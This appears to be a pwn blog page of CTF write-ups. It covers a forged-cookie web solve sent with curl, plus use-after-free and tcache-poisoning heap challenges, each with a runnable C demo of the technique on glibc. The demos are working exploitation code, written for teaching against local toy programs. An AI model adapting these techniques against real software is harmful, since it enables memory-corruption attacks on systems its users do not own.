Hi, I'm yu. I mainly write blogs about pwn / binary exploitation and things I have learned.
Journal of GCC2023 in Singapore
First of All In Preparation…
DiceCTF@HOPE
Challenges
[web] secure-page
    ...
    if admin == '':
        headers['set-cookie'] = 'admin=false'
    if admin == 'true':
        return (200, '''
    <title>Secure Page</title>
    <link rel="stylesheet" href="/style.css" />
    <div class="container">
        <h1>Secure Page</h1>
        %s</div>
    ''' % os.environ.get('FLAG', 'flag is missing!'), headers)
    ...
The admin cookie is set by the server but never signed, so the client can simply claim to be admin. Just set Cookie: admin=true in the request header and send the request:
    curl -H 'Cookie: admin=true' https://secure-page.mc.ax
    hope{signatures_signatures_signatures}
[web] reverser
Template injection is likely to occur at the following:
    @app.post('/')
    def reverse():
    ....
uaf4b - CakeCTF2021
Plan
Overwrite the function pointer with system() through a Use After Free.
About the COWSAY struct
In a freed chunk, fn_dialogue overlaps the tcache fd (next) pointer and message overlaps bk.
    typedef struct {
        void (*fn_dialogue)(char*);
        char *message;
    } COWSAY;
Also note that cowsay->fn_dialogue(cowsay->message) is executed in L167~171 of main.c:
    case 1:
        /* Use cowsay */
        printf("[+] You're trying to call 0x%016lx\n", (addr)cowsay->fn_dialogue);
        cowsay->fn_dialogue(cowsay->message);
        break;
malloced chunk
When it is malloced, the heap area is as follows....
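The plan above, replayed as an added example on a plain glibc build (this is not the uaf4b challenge binary). COWSAY is the struct from the write-up; say(), win() (a stand-in for system()), the dangling-call helper and the "user data" allocation that lands on the freed chunk are assumptions made for this demo.

```c
/* Added example, not the CakeCTF uaf4b binary: replays the UAF plan on glibc.
 * COWSAY is from the write-up; say(), win() and uaf_overwrite_fn_pointer()
 * are assumptions made for this demo (win() stands in for system()). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    void (*fn_dialogue)(char *);
    char *message;
} COWSAY;

static int win_called = 0;

static void say(char *msg) { printf("cow says: %s\n", msg); }

/* Stand-in for system(): records that the hijacked call reached it. */
static void win(char *arg) {
    printf("win(\"%s\") reached\n", arg);
    win_called = 1;
}

/* Returns 1 when the dangling cowsay->fn_dialogue call lands in win(). */
int uaf_overwrite_fn_pointer(void) {
    COWSAY *cowsay = malloc(sizeof(COWSAY));   /* 16 bytes -> 0x20 chunk */
    cowsay->fn_dialogue = say;
    cowsay->message = "moo";
    cowsay->fn_dialogue(cowsay->message);      /* normal use */

    /* The bug: the chunk is freed but the pointer is kept. In the freed chunk
     * the tcache next (fd) overlays fn_dialogue and key overlays message. */
    free(cowsay);

    /* Any same-size allocation is served from tcache[0x20], i.e. the very same
     * chunk. In the challenge this is the attacker-controlled text buffer. */
    char *user = malloc(sizeof(COWSAY));
    if ((void *)user != (void *)cowsay) {
        /* no reuse: allocator is not behaving like glibc tcache, demo cannot proceed */
        free(user);
        return 0;
    }
    uintptr_t fake_fn = (uintptr_t)win;             /* in the CTF: address of system */
    char *fake_msg = "/bin/sh";                     /* in the CTF: the argument string */
    memcpy(user, &fake_fn, sizeof fake_fn);         /* lands on fn_dialogue */
    memcpy(user + 8, &fake_msg, sizeof fake_msg);   /* lands on message */
    __asm__ __volatile__("" ::: "memory");          /* force a reload of the struct fields */

    /* Same call as L167~171 of main.c, now through the dangling pointer. */
    printf("[+] You're trying to call 0x%016lx\n",
           (unsigned long)(uintptr_t)cowsay->fn_dialogue);
    cowsay->fn_dialogue(cowsay->message);
    return win_called;
}

int main(void) {
    return uaf_overwrite_fn_pointer() ? 0 : 1;
}
```

The only attacker input is the 16 bytes written into the reallocated buffer; because tcache hands the freed 0x20 chunk straight back, those bytes become the struct's function pointer and argument.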
Beginner's Heap - SECCON Beginner's CTF 2020
Plan
Overwrite the next chunk's fd pointer through a heap overflow, then get the win function called by tcache poisoning.
Preparation
After the allocations, freeing B links its chunk into the tcache:
    -=-=-=-=-= TCACHE -=-=-=-=-=
    [ tcache (for 0x20) ]
    ||
    \/
    [ 0x000055dfd3002350(rw-) ]
    ||
    \/
    [ END OF TCACHE ]
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vulnerability
The vulnerability is a heap overflow: you can write 0x80 bytes into a chunk allocated for 0x18.
Overwrite B's fd pointer
Right now there is no freed chunk linked after B, because the freed chunk's fd is NULL....
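The overflow-into-fd plan above, replayed as an added example on glibc (this is not the SECCON challenge binary). Chunks a/b/c, the fake_target slot with its fake 0x21 size header, and the safe-linking version check are assumptions made for this demo; on glibc before 2.32 the freed chunk's fd is the raw pointer (NULL at the end of the list, as in the write-up), on 2.32 and later it is mangled with the chunk address, so the demo handles both.

```c
/* Added example, not the SECCON Beginner's Heap binary: heap overflow ->
 * tcache poisoning on glibc (2.26+ tcache). a/b/c, fake_target and the
 * 0x21 fake size are assumptions made for this demo. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <gnu/libc-version.h>

/* Where we want malloc() to hand out a pointer. A real exploit aims this at a
 * hook/GOT slot; here it is a static buffer preceded by a sane fake chunk
 * header (size 0x21 = 0x20 | PREV_INUSE) and 16-byte aligned, so tcache's
 * alignment check and any size check on the returned chunk are satisfied. */
static struct {
    uintptr_t prev_size;
    uintptr_t size;
    char user[48];
} fake_target __attribute__((aligned(16)));

/* glibc >= 2.32 mangles tcache next pointers: next = target ^ (&next >> 12). */
static int has_safe_linking(void) {
    int major = 0, minor = 0;
    sscanf(gnu_get_libc_version(), "%d.%d", &major, &minor);
    return major > 2 || (major == 2 && minor >= 32);
}

/* Returns 1 if the second malloc() after the poison returns fake_target.user. */
int tcache_poison_via_overflow(void) {
    int safe_linking = has_safe_linking();   /* done before touching the heap */
    fake_target.size = 0x21;

    char *a = malloc(0x18);   /* the chunk we overflow from (0x20 chunk) */
    char *b = malloc(0x18);   /* its neighbour: B's fd is what we overwrite */
    char *c = malloc(0x18);   /* freed too, so tcache[0x20] has two entries */
    if (b != a + 0x20) {
        /* chunks not adjacent (tcache already held 0x20 chunks); demo cannot proceed */
        return 0;
    }

    free(c);
    free(b);                  /* tcache[0x20]: b -> c -> END */

    /* The overflow: A's 0x18 usable bytes are followed by B's 8-byte size
     * field, then B's user data, whose first 8 bytes are the tcache fd. */
    uintptr_t *b_fd = (uintptr_t *)(a + 0x20);   /* same address as b */
    uintptr_t fake = (uintptr_t)fake_target.user;
    if (safe_linking)
        fake ^= (uintptr_t)b_fd >> 12;            /* PROTECT_PTR(&b->next, target) */
    *(volatile uintptr_t *)b_fd = fake;           /* tcache[0x20]: b -> fake_target */

    char *first = malloc(0x18);   /* returns b; bin head becomes fake_target */
    char *second = malloc(0x18);  /* returns fake_target.user */
    printf("a=%p b=%p first=%p second=%p target=%p\n",
           (void *)a, (void *)b, (void *)first, (void *)second,
           (void *)fake_target.user);
    /* a and first are leaked on purpose: the 0x20 bin is corrupted now */
    return first == b && second == fake_target.user;
}

int main(void) {
    return tcache_poison_via_overflow() ? 0 : 1;
}
```

Two chunks are freed so that the bin's count still allows a second tcache malloc after b is taken; with only B freed, the second request would fall through to the top chunk instead of the poisoned pointer. In the challenge the same second allocation is what gets the win function's address into the write primitive's reach.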